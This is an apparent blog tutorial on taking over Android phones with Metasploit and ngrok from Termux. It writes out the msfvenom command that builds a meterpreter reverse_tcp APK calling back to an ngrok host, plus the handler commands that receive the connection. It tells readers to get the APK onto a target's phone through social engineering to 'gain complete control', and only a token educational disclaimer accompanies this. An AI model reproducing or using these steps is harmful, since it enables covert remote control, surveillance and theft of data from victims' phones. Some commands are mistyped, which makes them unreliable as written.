Android Hacking Using Metasploit & Ngrok(Termux)

Hello guys through this article i wanna show you how you could easily gain access over an android device using metasploit and ngrok using Termux.

Disclaimer: TO BE USED FOR EDUCATIONAL PURPOSE ONLY!!


So lets get started by getting to know what is metasploit. Metasploit is the world’s most used penetration testing framework which enables you to find, exploit and validate vulnerabilities. It is developed by Rapid7 and is the most preferred framework for penetration testing.

So how does Ngrok come in the picture??
The answer is while testing for external(WAN) networks using metasploit we are required to make some complex configurations like port forwarding , having a static IP etc. Using Ngrok you can skip these complexities .

Firstly download Termux from play store into your android device.


You then need to visit Ngrok’s website and signup first to get an account then download the linux(arm) version on your android phone you will have the file downloaded in your phone and you will have an activation key in the window we will use it later on so don’t close the tab.

Open Termux in your android phone and type the command ls

If you don’t see a folder named storage the type the following command.


termux-setup-storag


If you again type in the ls command you will see a folder named storage.To open that folder type


cd storage


then go to downloads folder by typing the command


cd downloads


now if you type ls you will see all your downloads copy the name of the ngrok zip file and type in the command


unzip (filename)


This command will unzip the file now you would move the file from downloads to Termux by typing the command


mv ngrok /$HOME


now type


cd —


Now you would land up in the termux root so you would need to change the permissions of the folder you just moved by typing the command

chmod +x ngrok


Now to execute the file type


./ngrok


Now you would be required to authenticate your account by copying the auth token from the page where you downloaded your ngrok zip file copy the auth token and in the termux type the following


./ngrok authtoken (your auth token)


Now your account is authenticated and your token will be saved in a configuration file. Now open the hotspot of your android device and to run ngrok type the command


./ngrok tcp 4543


You can provide any port I’m giving 4543. now open a new termux session by swiping from the left and clicking on new session DON’T CLOSE THIS SESSION. In the new session type the command


pkg install unstable-repo


Then you would be required to install metasploit by typing the command


pkg install metasploit


The next CRUCIAL step is to create a Payload. To create a payload you would need to understand certain keywords associated with any metasploit payload. The keywords or parameters of our concern are LHOST and LPORT.



HERE LHOST=0.tcp.ngrok.io (which you can see in the forwarding row in the ngrok session) & LPORT is 17143 (which is right next to the : )

Now to create a Payload using metasploit type the following command


msfvenom -p android/meterpreter/reverse_tcp LHOST =0.tcp.ngrok.io LPORT = 17143 R> sample.apk


The above command would create a Payload application which would be stored in termux root. To move the application to your phone storage type


mv sample.apk /storage/emulated/0/


Now we have reached the final and most important step that is to use the metasploit framework to gain access over the target device. To run metasploit type


msfconsole




NOTE:-THE NGROK SESSION MUST ALWAYS BE ONLINE THROUGHOUT THE PROCESS.


You can send the apk file to your target by any means either by social engineering or any other method.

Now in the metasploit session type in the following commands one by one


use exploit/multi/handler


set payload


android/meterpreter/reverse_tcp


set LHOST localhost


set LPORT 4543


The above commands would be the same for all if you used the same port as mine. Now finally type


exploit


By this time you would be listening to connections on the specified port.Now when the target device installs the application you created you would establish a connection with the target device and you would gain complete control over the target phone.

When a connection is established you would look at a screen like this



In the meterpreter session you can type the command help to show all the available options and explore the commands.

Congratulations you have successfully learned how to hack into a target android over WAN using metasploit and ngrok.